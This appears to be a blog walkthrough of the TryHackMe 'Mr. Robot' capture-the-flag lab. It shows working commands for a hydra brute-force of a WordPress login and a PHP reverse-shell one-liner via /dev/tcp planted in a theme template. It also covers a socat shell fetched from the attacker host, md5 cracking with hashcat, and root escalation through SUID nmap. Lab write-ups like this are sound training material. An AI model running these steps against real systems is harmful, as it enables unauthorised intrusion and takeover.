TryHackMe Mr. Robot CTF

Welcome to my walk through of Mr. Robot CTF on TryHackMe. I had a lot of fun with this machine and learned some new tricks.

First off let’s start off by nmaping the machine. I always start off with all the ports and then go back and scan them for services.

nmap -T4 -p- 10.10.210.193

We can see that ports 80 and 443 are open and port 22 is closed. Let’s see what services may be behind those.

nmap -T4 -p 22,80,443 10.10.210.193

Looks like the web server is going to be the best option, so let’s view it in our web browser. We have a few commands we can run. Going through them will give you various different dialogs.

Something to always check is the robots.txt file. This file will tell search engines what pages they aren’t allowed to crawl, this is useful for hiding login pages from the internet. The downside, but great for us, is that it can lead us to various pages on the site.

We have a possible dictionary file and our first flag, visit https://10.10.210.193/key-1-of-3.txt and submit it to TryHackMe.

Also download the fsocity.dic by visiting https://10.10.219.193/fsocity.dic.

Let’s looks at the file fsocity.dic. First let’s see how many lines are in the file.

Alright that’s a ton of lines, I wonder if any of them are duplicates.

Great that reduced our dictionary a lot, but where can we use the dictionary?

I have installed Wappalyzer to view the various technologies in use on a page.

I wonder if there is a wordpress login page somewhere. We can make the guess that it’s https://10.10.210.193/wp-admin.

Additionally we can use gobuster to find the directory

gobuster dir -u http://10.10.210.193 -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt

dir is the mode we want to run for directory/file bruteforcing. -u is the url we want to attack. -w is the wordlists.

Many wordlists are built into Kali at /usr/share/wordlists/

we can visit https://10.10.210.193/login.

This actually redirects us to wp-login.php great! Now we just need a username, let’s try some characters from Mr. Robot.

Looks like neither of these 2 are correct, but WordPress is suffering from a username enumeration vulnerability. Any username we try it will tell us whether it is valid or not. Let’s try Elliot

Alright it looks like we have our username. Now maybe we can use fsociety.dic, or in my case NewFSociety.dic (with the duplicates removed). Let’s use hydra to brute force the page.

hydra -l Elliot -P NewFSociety.dic 10.10.255.10 http-post-form “/wp-login:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https%3A%2F%2F10.10.255.10%2Fwp-admin%2F&testcookie=1:S=302”

-l is for our username, Elliot which we confirmed. -P is the dictionary for passwords. We give it the IP address, and then say we want to run http-post-form, since we are making a post request with our login.

The next part of the command says we are looking for a redirect to wp-admin page, which would say we had a successful login. At the end the 302 is the HTTP code for redirecting, which will happen upon a successful login.

NOTE: Halfway through my machine started giving me an error when visiting, wp-login.php “Error establishing a database connection” I started up a new machine and the IP address is now.

Running hydra will take some time to give you a successful login, I set a timer on my phone and added an hour once or twice while waiting for this to finish.

Let’s login and see what we can do. WordPress is based on PHP so we should be able to get a reverse shell.

Once you login, click on Appearance and then click Editor. I chose the 404 Template, because it’s something we can trigger by visiting an invalid page. Check for a php reverse shell. You can use PentestMonkey’s php shell located at https://github.com/pentestmonkey/php-reverse-shell. Simply change the IP and Port and then page it into the editor between the <?php> tags.

Additionally you can try a oneliner.

<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/IPADDRESS,1337 0>&1′”);?>

First start your netcat listener – nc -nlvp 1337

Visit a page that doesn’t exist such as hacked and you will be presented with a shell. Running whoami shows we are daemon.

Trying to run sudo -l says we don’t have a tty present. Let’s download socat and get a full tty. Additionally we could try python to upgrade the shell.

python -c ‘import pty; pty.spawn(“/bin/sh”)’

This works, but let’s use socat as another example. Download the file and server it from a python server. Copy socat into your current working directory

which socat – This finds the directory it’s at.

cp /usr/bin.socat .

Spin up the python server

python -m SimpleHTTPServer 7777

Now from our shell move into tmp and download the socat binary

cd /tmp && wget http://IPADDRESS:7777/socat

Now upgrade your shell with socat.

First start a listener on your attacker machine

socat file:`tty`,raw,echo=0 tcp-listen:7777

Now replace the IP with your attacker IP. Also make socat executable

chmod +x socat

socat tcp-connect:IP:7777 exec:/bin/sh,pty,stderr,setsid,sigint,sane
socat tcp-connect:IP:7777 exec:/bin/bash,pty,stderr,setsid,sigint,sane

Now let’s take a look at the user’s home directory

cd /home

ls

cd robot

We see the second flag and a file titled password.raw-md5

Save the hash on your local kali machine and run hashcat against it.

hashcat -a 0 -m0 Robothash /usr/share/wordlists/rockyou.txt –force

We will use straight attack mode, give it -m0 because it’s an md5 hash, and a wordlists. Finally I use –force because I am in a virtual machine, which triggers errors.

At first I tried to ssh in with the user robot, but that didn’t work because port 22 is closed.

So simply su robot in your shell and enter the password when prompted.

Sadly we can’t run sudo at all. If we could maybe we could privilege escalate from a binary. I always turn to https://gtfobins.github.io/ to see how to escalate with various binaries and how to break out of shell and do other things.

Let’s look for any SUID binaries. Certain binaries need to be run as root, but need to be able to run with root privileges. An example of this is passwd or ping. Passwd needs root permissions to change the etc/shadow file with a updated password. Ping needs root permissions in order to open a TCP socket.

Run find / -perm -u=s -type f 2>/dev/null to look for these special binaries.

Most of these look normal, except nmap. While certain scans do require root privileges to execute properly, we may be able to get a root shell.

Nmap has an interactive mode that can actually give us this root shell. Looking at GTFO Bins we can see how to escalate. https://gtfobins.github.io/gtfobins/nmap/

We can run nmap in interactive mode by running nmap –interactive.

Then we can spawn a shell using !sh. I tried to use !bash, but that didn’t spawn us a shell.

cd / and then cat key-3-of-3.txt

Congratulations we have root this machine. I hope you learned something new from this post!

Until next time continue HACKING THE PLANET!!!